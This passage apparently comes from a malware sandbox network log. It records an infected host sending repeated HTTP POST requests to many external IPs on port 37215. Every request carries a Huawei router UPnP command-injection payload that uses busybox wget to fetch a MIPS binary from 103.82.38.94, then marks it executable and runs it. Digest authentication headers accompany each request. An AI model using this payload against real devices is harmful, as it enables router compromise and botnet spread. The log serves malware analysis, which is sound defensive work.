[TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        57192.168.2.1447336197.207.180.1337215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092273951 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        58192.168.2.1434986156.229.85.4937215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092304945 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        59192.168.2.1449978197.190.253.8837215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092329025 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        60192.168.2.145438641.239.49.18537215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092355967 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        61192.168.2.144863441.167.190.7537215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092387915 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        62192.168.2.1435904156.243.0.18337215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092411041 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        63192.168.2.1437550197.112.42.24837215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092438936 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        64192.168.2.145230641.46.183.10237215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092508078 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        65192.168.2.1436094156.13.57.25037215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092534065 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        66192.168.2.144736641.1.138.11737215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092572927 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        67192.168.2.143536441.29.87.9437215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092592955 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
